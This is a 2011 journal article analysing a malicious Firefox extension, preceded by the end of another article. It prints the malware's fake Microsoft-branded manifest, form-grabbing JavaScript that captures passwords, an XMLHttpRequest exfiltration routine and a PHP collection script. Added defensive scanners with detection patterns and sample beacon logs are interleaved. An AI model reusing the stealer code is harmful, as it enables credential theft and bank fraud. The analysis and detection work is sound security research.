Elsevier NESE - Spying on the Browser
…circumnavigation talk, and also assumes usage is only taking place in areas of pervasive filtering. It does not, for example, allow for the many people who will use such tools in less filtered countries to access video content on sites that restrict it to domestic users for copyright reasons. Many people use HotspotShield to connect to video sites such as Hulu, or to use the BBC's iPlayer, for example.

Perhaps, in the broader scheme of things, most residents of heavily censored countries are happy to use those countries' own versions of western services such as search engines and social networks. For freedom of speech and anti-censorship activists, the biggest challenge may not be technical – it may be convincing others to care.

About the author

Danny Bradbury is a freelance technology writer who has written regularly for titles including The Guardian, Financial Times, National Post, and Backbone magazine, in addition to editing several security and software development titles. He specialises in security and technology writing, but is also a documentary film maker and is currently working on a non-fiction book project.


Spying on the browser: dissecting the design of malicious extensions

Aditya K Sood and Richard J Enbody, Michigan State University

Network Security, May 2011

Browsers are a vital component of every computer system as they serve as the interface to the Internet. However, the extensible nature of browsers has facilitated the proliferation of malware infections. In this article, we examine the design of malicious extensions used to steal information from browsers in order to conduct illegal transactions. The focus is on Mozilla's Firefox – but other browsers that share these characteristics will also share similar vulnerabilities.

Since a browser is an integral part of the client-side framework, extensions are platform independent because these extensions communicate with the operating system using browser access rights. In general, malicious extensions exploit the browser's trust with the website when a user initiates a session. There have been incidents with Mozilla's Firefox browser where malicious extensions were used to steal sensitive information.[1,2] Bank fraud is a key target for these malicious extensions.

Monolithic design

The monolithic design of browsers is based on the assumption that this approach makes it possible to develop code with fewer bugs, because of the reduced complexity when addressing different components. The approach uses Inter Process Communication (IPC) to
achieve co-ordination among components. The parent process allocates memory for all the running instances (tabs) of the browser. Similarly, a single process handles all the memory-related operations. Since browsers run in user space, the monolithic interface allows the code to run freely because user access rights are utilised for operations. This model can be exploited by malicious extensions in order to exploit these useful components in the browser address space for nefarious purposes. Mozilla uses the monolithic model for its Firefox browser.

A browser runs in the application layer (ring 3). However, the components have elevated privileges to interact efficiently with operating system structures. Malicious extensions exploit the following design components.

Insecure sandbox

Malicious extensions in Mozilla utilise a default extension model for browsers that is actually free from sandboxing.[3] There are no appropriate sandbox functions incorporated for securing extensions by reducing privileges and access rights, which would prohibit the browser from running extensions. In general, from an authorisation perspective, there is no security mechanism applied to extensions. Therefore, the browser architecture does not restrain control over the interface used to carry out the operations within different browser components. This weakness provides an opportunity for developing malicious extensions, thereby exploiting the default behaviour of browsers.

Unrestricted communication interface

The communication channel between different browser components is not restricted because of interdependency among the components. The browser communication model follows two basic patterns of communication, named Component-to-Component (C2C) and JavaScript-to-Component (J2C). Most browsers use the Component Object Model (COM) for modularisation of code – for example, Mozilla uses XPCOM. Attackers exploit the default communication model and inherent code modularity to create a malicious extension that is capable of undertaking the following nefarious activities:

• It can be used with other applications by incorporating a JavaScript wrapper function.
• It can perform malicious updates on other installed extensions by using standard API functionality.[4]
• It uses asynchronous HTTP requests via AJAX, with associated events to generate listener functions for communication with third-party servers. It can use encrypted protocols for data transfer.
• It can interact with the installed plug-ins, such as PDF or Flash, in order to launch malicious code and exploit certain vulnerabilities in the browser itself.

Unified global namespace

Another factor behind the rapid escalation of malicious extensions is the sharing of the same address space and memory as that of the parent browser. Malicious extensions utilise the global namespace. As an outcome of this design, unrestricted operations in the same address space can result in subverting the browser components. Robust policy mechanisms have not been deployed for securing the persistent state of browser extensions. The problem lies in the browser design of not compartmentalising components and applying customised access policies based on individual roles.

Listing 1: Fake extension identity described in RDF format

    <?xml version="1.0"?>
    <RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
         xmlns:em="http://www.mozilla.org/2004/em-rdf#">
      <Description about="urn:mozilla:install-manifest">
        <em:id>Secure Add On</em:id>
        <em:name>Microsoft Safe Browsing Security Policies</em:name>
        <em:description>Protect your computer from security threats</em:description>
        <em:version>3.2.7</em:version>
        <em:creator>Microsoft – 2010</em:creator>
        <em:homepageURL>…px</em:homepageURL>
        <em:type>2</em:type>
        <!-- Mozilla Firefox -->
        <em:targetApplication>
          <Description>
            <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
            <em:minVersion>3.0</em:minVersion>
            <em:maxVersion>5.*</em:maxVersion>
          </Description>
        </em:targetApplication>
      </Description>
    </RDF>

Firefox case study: intrinsic behaviour and design relevance

This case study is an outcome of real-time analysis of one of the most widely used malicious extensions that is designed for the Mozilla Firefox browser. In order to understand the working behaviour, it's necessary to take a close look at the design of this extension, and to examine the prototype of this malware extension through the use of code snippets. Most malware extensions follow the paradigm of a client and server side communication model. In addition, proprietary browser extensions are also vulnerable to security flaws that can be
exploited to take control of the entire system. Related work on securing extensions has been done to show the process of designing secure extensions free from vulnerabilities.[5] Of course, malicious extensions do not care that extensions should be secure.

Generally, the aim of malicious extensions is to steal sensitive data from the user and transfer it to an attacker-controlled domain. Malicious extensions exploit the trust model used by the browser to set up a communication channel between the browser and the website. Usually, this process is completed when a session is created with a target website hosted on third-party servers. The point is that HTTP running over SSL offers no protection against malicious extensions. Most users have a false sense of security when websites use HTTPS. However, this is not justified because HTTPS protects users only from transport layer attacks. Ironically, HTTPS actually protects the malicious session from such attacks. HTTPS preserves the integrity of data, but because the malicious code is within the browser, data can be manipulated even before it enters the network layer.

Why doesn't anti-malware software catch malicious extensions? Malicious extensions are not scanned by anti-malware solutions because extensions are considered to be secure components by default. We have seen some browser plug-in integrity checkers that detect the presence of secure and insecure plug-ins based on the version information. However, for extensions, this version scanning technique is not effective because extensions are not proprietary code used by vendors or software companies. As a result, malicious extensions are not impacted by antivirus solutions.

The basic operation is:

1. A user visits a site that has been infected with malicious code.
2. The malicious site installs a malicious extension into the user's browser.
3. Within the browser, the malicious extension snoops on the user's browser activity.
4. Information collected by the malicious extension is sent to an attacker's remote server.

Figure 1: Malicious extension installed in victim's browser.

Listing 2: Wrapper function to steal data in forms

    window.document.onsubmit = scan_forms;

    //Scan the document forms
    function scan_forms() {
      var forms = content.document.getElementsByTagName('form');
      for(var i=0; i<forms.length; i++) {
        if(forms[i].id)
          var form = content.document.getElementById(forms[i].id);
        else
          var form = content.document.forms[i];
        for(var c=0; c<form.elements.length; c++) {
          if(form.elements[c].type == 'password' && form.elements[c].value != '')
            detect_information(form);
        }
      }
    }

    function detect_information(form) {
      //EDIT THIS BELLOW TO MATCH YOUR LOGGIN SCRIPT
      var host = '';

      //Record time and date
      var currentTime = new Date();
      var minutes = currentTime.getMinutes();
      if (minutes < 10)
        minutes = '0' + minutes;
      var date = currentTime.getHours()+':'+minutes+' || '+currentTime.getMonth()+1+'/'+currentTime.getDate()+'/'+currentTime.getFullYear();

      // As printed in the published listing: the URL is built in 'info' but the
      // loop below appends to, and send() is given, 'key_strokes'.
      var info = host+'?time='+date+'&p-domain='+content.document.location.href;

      //Add the collected form data
      for(var c=0; c<form.elements.length; c++)
        key_strokes += '&'+form.elements[c].name+'='+form.elements[c].value;
      send(key_strokes);
    }
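The behaviour the article attributes to Listing 2 (hooking form submission, testing inputs for type 'password', copying element values, and handing the result to an outbound request) is a pattern that can be looked for in an extension's own JavaScript before the add-on is allowed into a managed browser fleet. The following heuristic scanner is an added example and is not part of the article or the analysed extension; the indicator regexes, the two constructed samples and the verdict thresholds are all assumptions, and it reads source text only (an XPI would first have to be unzipped).

```python
import re

# Heuristic indicators for the form-harvesting pattern described in Listings 2 and 3
# (assumption: these regexes are a starting point, not a complete signature set).
INDICATORS = {
    "submit_hook": re.compile(r"\.onsubmit\s*=|addEventListener\(\s*['\"]submit['\"]"),
    "password_field": re.compile(r"\.type\s*===?\s*['\"]password['\"]"),
    "form_value_harvest": re.compile(r"\.elements\[[^\]]+\]\.value"),
    "outbound_request": re.compile(r"\bXMLHttpRequest\b|ActiveXObject\(\s*['\"]Microsoft\.XMLHTTP['\"]\s*\)"),
    "location_leak": re.compile(r"document\.location\.href"),
}

# Touching password fields or bulk-copying form values is rare in benign add-ons;
# combined with an outbound request it matches the article's case study.
SENSITIVE = {"password_field", "form_value_harvest"}


def scan_extension_source(source: str) -> dict:
    """Return {indicator: hit_count} for every indicator found in a JavaScript source."""
    hits = {}
    for name, pattern in INDICATORS.items():
        count = len(pattern.findall(source))
        if count:
            hits[name] = count
    return hits


def verdict(hits: dict) -> str:
    """Classify a scan result as 'suspicious', 'review' or 'benign'."""
    if SENSITIVE.issubset(hits) and "outbound_request" in hits:
        return "suspicious"
    if hits.keys() & SENSITIVE:
        return "review"
    return "benign"


# Constructed sample that uses the same idioms as the article's Listings 2 and 3.
SUSPICIOUS_SAMPLE = """
window.document.onsubmit = harvest;
function harvest() {
  var form = content.document.forms[0];
  for (var c = 0; c < form.elements.length; c++) {
    if (form.elements[c].type == 'password' && form.elements[c].value != '')
      payload += '&' + form.elements[c].name + '=' + form.elements[c].value;
  }
  var xmlhttp = new XMLHttpRequest();
  xmlhttp.open('GET', beacon + payload + '&p-domain=' + content.document.location.href, true);
  xmlhttp.send(null);
}
"""

# Constructed sample of a harmless add-on: it makes a request but never reads form fields.
BENIGN_SAMPLE = """
document.addEventListener('DOMContentLoaded', function () {
  var xmlhttp = new XMLHttpRequest();
  xmlhttp.open('GET', 'https://theme.example/style.css', true);
  xmlhttp.send(null);
});
"""

if __name__ == "__main__":
    for label, src in (("suspicious sample", SUSPICIOUS_SAMPLE), ("benign sample", BENIGN_SAMPLE)):
        hits = scan_extension_source(src)
        print(f"{label}: {verdict(hits)} {hits}")
```

The scanner answers the question the article raises about antivirus coverage: a signature on version strings cannot see this, but a review of the add-on's source for the combination of password-field access plus an outbound channel can, and anything that trips only one of the two goes to a human for review rather than being blocked outright.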
Visiting malicious domains

An attacker coerces legitimate users to visit a malicious domain by using different types of web attacks, such as Cross-Site Scripting (XSS), clickjacking, unvalidated redirects and phishing attacks. The attacker exploits social networks and popular websites in order to use them as a platform for spreading malware. In addition, once the user visits a malicious domain, the attacker uses social engineering tricks to distribute malicious extensions. Effectively, the attacker asks the user to install an extension using a false identity, as described next.

Fake extension identity

A fake identity is one mode chosen by attackers to fool users. Any extension present in the browser is listed in the password manager. The attacker can make these extensions covert. In normal cases, malicious extensions are installed using fake identities. This step is actually a social engineering trick that exploits the ignorance of the user. The trick works because legitimate users are generally not able to identify the authentic nature of the extension. The code snippet presented in Listing 1 shows the fake information used by one malicious extension. This information is extracted from the install.rdf file that is used to configure the malicious extension. This file is used to specify the identity of the extension. The identity description is used by an extension manager to display information to the user. The file shows that the malicious extension installs itself with an identity of 'Microsoft Safe Browsing Policies'. From the user's perspective, it appears to be from Microsoft, so it must be trustworthy. Figure 1 shows the malicious extension installed in the victim's browser.

Snooping form information

Web forms are used for submitting information online to the target websites. Attackers write hidden code to steal sensitive data from these forms in order to use the information (processed data) to launch illegal operations 'on behalf' of users. For example, bank websites require a user to validate a username and password, as well as a token (sometimes), in order to initiate a session for financial transactions. A malicious extension residing in the browser uses a wrapper function to read the submitted form data continuously. In this way, data is stolen well before it enters the network. The browser's built-in auto-complete functionality aids the stealing process. Attackers exploit this design model to conduct attacks silently, thereby reading data from the web-based forms. The code presented in Listing 2 shows exactly how the data is read from the forms by malicious extensions.

In Listing 2, a malicious extension continuously scans and searches the content rendered in the browser to find the forms. If the form is active in the session, the code looks for the password field. If the password field is not empty, then the scan_forms function calls the detect_information function in order to collect data from the forms and provide a timestamp. The host information is also collected.

Listing 3: Data transference through XMLHttpRequest calls

    //Send the information
    function send(key_strokes) {
      var xmlhttp;
      if (window.XMLHttpRequest)
        xmlhttp = new XMLHttpRequest();
      else if (window.ActiveXObject)
        xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
      xmlhttp.open("GET", key_strokes, true);
      xmlhttp.send(null);
    }

Listing 4: PHP-based logging script

    <?php
    //Open log file to append data
    $save = fopen('key_strokest.txt', 'a');
    fwrite($save, "########################################\nIP =".$_SERVER['REMOTE_ADDR']."\n");
    foreach (array_keys($_GET) as $name) {
      if($name == 'time')
        fwrite($save, 'TIME =>'.$_GET['time']."\n");
      elseif($name == 'p-domain')
        fwrite($save, 'DOMAIN => '.$_GET['p-domain']."\n");
      else
        fwrite($save, $name.' = '.$_GET[$name]."\n");
    }
    //Close the log file
    fwrite($save, '#####################################'."\n\n");
    fclose($save);
    ?>
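The identity claims in Listing 1 can be checked mechanically before an add-on reaches a user: the em:id is not in either form Firefox accepts for an add-on id (a braced GUID or an email-style name@domain string), and the name and creator invoke a vendor whose domain does not appear in the homepage URL. The manifest checker below is an added example, not code from the article or its authors; the vendor-to-domain allow-list, the two constructed manifests (the first mirrors Listing 1) and the finding strings are assumptions.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

RDF_NS = "http://www.w3.org/1999/02/22-rdf-syntax-ns#"
EM_NS = "http://www.mozilla.org/2004/em-rdf#"

# Firefox accepts an add-on id only as a braced GUID or an email-style name@domain string.
GUID_ID = re.compile(r"^\{[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}\}$")
EMAIL_ID = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

# Constructed allow-list (assumption): a brand named in em:name/em:creator should be
# backed by a homepageURL on that vendor's own domain.
VENDOR_DOMAINS = {"microsoft": "microsoft.com", "mozilla": "mozilla.org", "google": "google.com"}


def _field(desc, tag):
    el = desc.find(f"{{{EM_NS}}}{tag}")
    return (el.text or "").strip() if el is not None else ""


def _host_matches(url: str, domain: str) -> bool:
    # Compare the parsed host, not a substring, so "evil-microsoft.com.example" does not pass.
    host = (urlsplit(url).hostname or "").lower()
    return host == domain or host.endswith("." + domain)


def check_install_rdf(xml_text: str) -> list:
    """Return a list of findings; empty when the manifest's identity claims are consistent."""
    root = ET.fromstring(xml_text.strip())
    desc = None
    for cand in root.iter(f"{{{RDF_NS}}}Description"):
        about = cand.get("about") or cand.get(f"{{{RDF_NS}}}about")
        if about == "urn:mozilla:install-manifest":
            desc = cand
            break
    if desc is None:
        return ["no-install-manifest: missing Description about=urn:mozilla:install-manifest"]

    findings = []
    ext_id = _field(desc, "id")
    if not (GUID_ID.match(ext_id) or EMAIL_ID.match(ext_id)):
        findings.append(f"id-format: {ext_id!r} is neither a GUID nor name@domain")

    homepage = _field(desc, "homepageURL")
    claims = (_field(desc, "name") + " " + _field(desc, "creator")).lower()
    for brand, domain in VENDOR_DOMAINS.items():
        if brand in claims and not _host_matches(homepage, domain):
            host = urlsplit(homepage).hostname or "missing"
            findings.append(f"vendor-claim-unverified: mentions '{brand}' but homepageURL host is {host}")
    return findings


# Constructed manifest with the same identity fields as Listing 1 (homepage left empty).
FAKE_MANIFEST = """<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
     xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <Description about="urn:mozilla:install-manifest">
    <em:id>Secure Add On</em:id>
    <em:name>Microsoft Safe Browsing Security Policies</em:name>
    <em:description>Protect your computer from security threats</em:description>
    <em:version>3.2.7</em:version>
    <em:creator>Microsoft - 2010</em:creator>
    <em:homepageURL></em:homepageURL>
    <em:type>2</em:type>
    <em:targetApplication>
      <Description>
        <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
        <em:minVersion>3.0</em:minVersion>
        <em:maxVersion>5.*</em:maxVersion>
      </Description>
    </em:targetApplication>
  </Description>
</RDF>
"""

# Constructed manifest whose claims are self-consistent.
BENIGN_MANIFEST = """<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
     xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <Description about="urn:mozilla:install-manifest">
    <em:id>formhelper@example.org</em:id>
    <em:name>Form Helper</em:name>
    <em:creator>Example Developer</em:creator>
    <em:homepageURL>https://example.org/formhelper</em:homepageURL>
    <em:type>2</em:type>
  </Description>
</RDF>
"""

if __name__ == "__main__":
    for label, text in (("fake", FAKE_MANIFEST), ("benign", BENIGN_MANIFEST)):
        print(label, check_install_rdf(text) or "no findings")
```

A manifest check of this kind only catches sloppy impersonation; a determined author can use a conforming id and a look-alike homepage, so it complements rather than replaces source review and a policy of installing only add-ons that have been verified.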
Data transfer mechanism

Once information is stolen, an asynchronous XML-based HTTP request, XMLHttpRequest, is used to transfer the stolen data back to the attacker's server. In Listing 3, the function sends all the captured key strokes to the attacker-controlled domain. These key strokes are nothing but data entered in the forms during an active session when the browser is interacting with banking websites. The data is captured character by character and transferred to the attacker's server running PHP-based log management scripts.

PHP-based back-end server log module

Malicious extensions communicate with the back-end servers to store stolen information offsite. The attacker's back-end server remains in a listening state in order to store information from the infected clients. Usually, a PHP-based script is used, as presented in Listing 4, to complete logging operations. The attacker uploads the PHP file on the domain to open a communication channel between the infected browser and the server.

The theft

The data collected from the browser and passed to the attacker's back-end server can be from a variety of sources, but one of the most useful is the login and password used for banking. With that information in hand, an attacker can clean out a bank account. If this attack is performed on an individual it can yield thousands of dollars, but if the attack is performed on a small business it can yield tens or hundreds of thousands of dollars.

The steps discussed above illustrate one instance of extension-based malware that is used to spy on browsers. The case study discussed above is an outcome of an analysis of a malicious extension that is designed to steal passwords from the login forms from various browsers. Extension-based malware has a potential impact on the robustness of browsers. In general, it is hard to design dynamic solutions to prevent the execution of malicious extensions. A user has to be aware of the types of extensions running in the browser and their functions. Unauthorised (unverified) extensions should not be allowed to install in the browser.

Conclusion

Extensions provide flexibility and portability in browsers. However, this case study shows an exploitation of the default design of the browser extension model which poses a serious threat to users. Attackers write sophisticated malware to try to exploit the inherent design of browsers. The analysis above shows that extension-based malware is very hard to detect and it can interact with the operating system with full privileged rights. This poses a grave risk to the privacy and security of users.

About the authors

Aditya K Sood is a security researcher, consultant and PhD candidate at Michigan State University. He has worked in the security domain for Armorize, COSEINC and KPMG, and founded SecNiche Security. He has been an active speaker at conferences such as RSA, Toorcon, Hacker Halted, TRISC, EuSecwest, XCON, OWASP AppSec and CERT-IN, and has written content for HITB Ezine, ISSA, ISACA, Elsevier, Hakin9 and Usenix Login. He may be reached at adi_ks@…

Dr Richard Enbody is an Associate Professor in the Department of Computer Science and Engineering, Michigan State University. He joined the faculty in 1987 after earning his PhD in Computer Science from the University of Minnesota. His research interests are in computer security, computer architecture, web-based distance education and parallel processing. He has two patents pending on hardware buffer-overflow protection, which will prevent most computer worms and viruses. He recently co-authored a CS1 Python book, The Practice of Computing using Python. He may be reached at …

Resources

• Ter Louw, M; Lim, JS; Venkatakrishnan, VN. 'Enhancing web browser security against malware extensions'. <http://…e6w885835035ur27/fulltext.pdf>.
• Florio, Elia; Wüest, Candid. 'Firefox and Malware: when your browser bites you'. <http://www.virusbtn.com/pdf/conference_slides/2009/Wueest-Florio-VB2009.pdf>.

References

1. Keizer, G. 'Mozilla yanks password-stealing Firefox add-on'. Computerworld, 14 Jul 2010. Accessed Apr 2011. <http://…cle/9179167/Mozilla_yanks_password_stealing_Firefox_add_on>.
2. 'Mozilla Add-on Extension Steals Login Details'. Spamfighter, 27 Jul 2010. Accessed Apr 2011. <http://…on-Extension-Steals-Login-Details-14810-News.htm>.
3. Elliot, Kevin; Binkley, Jim; Hook, James. 'Mozilla Firefox Extension Security: an overview of potential attack vectors'. 2 Dec 2009. Accessed Apr 2011. <http://web.cecs.pdx.edu/~kevine/cs591_firefox_ext_sec_paper.pdf>.
4. Felt, AP. 'A Survey of Firefox Extension API Use'. 16 Oct 2009. Accessed Apr 2011. <http://…TechRpts/2009/EECS-2009-139.pdf>.
5. Barth, A; Felt, AP; Saxena, P; Boodman, A. 'Protecting Browsers from Extension Vulnerabilities'. 2009. <http://www.…sions.pdf>.
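The transfer mechanism in Listings 3 and 4 leaves a distinctive trace on the wire: a GET request whose query string carries a time stamp, a p-domain parameter holding the victim site's URL, and the harvested form fields by name. Where an organisation routes browser traffic through a logging proxy or reverse proxy, that shape can be hunted for in access logs. The detector below is an added example, not part of the article; its log layout (Apache's combined format with the virtual host field first), the three constructed log lines, the credential parameter names and the severity thresholds are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed log layout (assumption): Apache "%v %h %l %u %t \"%r\" %>s %b", with the
# served virtual host first so it can be compared with any host embedded in the query.
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameter names that should never travel in a GET query string (assumption).
CRED_PARAMS = {"password", "passwd", "pwd", "pass", "pin", "token", "otp"}


def analyse_line(line: str):
    """Return an alert dict for one access-log line, or None when nothing is suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_qs(urlsplit(m["target"]).query)
    names = {k.lower() for k in params}
    reasons = []

    # A request to host A whose parameters contain a full URL on host B is the
    # p-domain pattern of Listing 2: the victim origin is reported to the collector.
    embedded = {urlsplit(v).hostname for vals in params.values() for v in vals
                if v.startswith(("http://", "https://"))}
    foreign = sorted(h for h in embedded if h and h != m["vhost"])
    if foreign:
        reasons.append("query embeds another site's origin: " + ", ".join(foreign))

    creds = sorted(names & CRED_PARAMS)
    if creds:
        reasons.append("credential-looking parameters in a GET query: " + ", ".join(creds))

    if {"time", "p-domain"} <= names:
        reasons.append("parameter names match the Listing 4 logging script")

    if not reasons:
        return None
    return {"client": m["client"], "vhost": m["vhost"], "time": m["ts"],
            "severity": "high" if len(reasons) >= 2 else "low", "reasons": reasons}


def scan_log(lines) -> list:
    """Run analyse_line over an iterable of log lines and keep the alerts."""
    return [alert for alert in (analyse_line(line) for line in lines) if alert]


# Constructed sample: one beacon shaped like Listings 2-4, one ordinary search,
# one redirector hit that embeds a URL but carries no credentials.
SAMPLE_LOG = """\
collector.example 10.0.0.5 - - [12/May/2011:09:14:02 +0000] "GET /log.php?time=9:14%20||%205/12/2011&p-domain=https://bank.example/login&username=alice&password=hunter2 HTTP/1.1" 200 12
collector.example 10.0.0.9 - - [12/May/2011:09:15:10 +0000] "GET /search?q=firefox+extension&time=latest HTTP/1.1" 200 5120
collector.example 10.0.0.7 - - [12/May/2011:09:16:44 +0000] "GET /r?u=https://news.example/story/42 HTTP/1.1" 302 0
"""

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG.splitlines()):
        print(f"[{alert['severity']}] {alert['client']} at {alert['time']}")
        for reason in alert["reasons"]:
            print("   -", reason)
```

The article notes that such extensions can use encrypted protocols for the transfer, so this only works where the proxy terminates TLS or the beacon is sent in the clear; the high-severity match also points directly at the affected client and the victim origin, which is what an incident responder needs to force a credential reset on the right accounts.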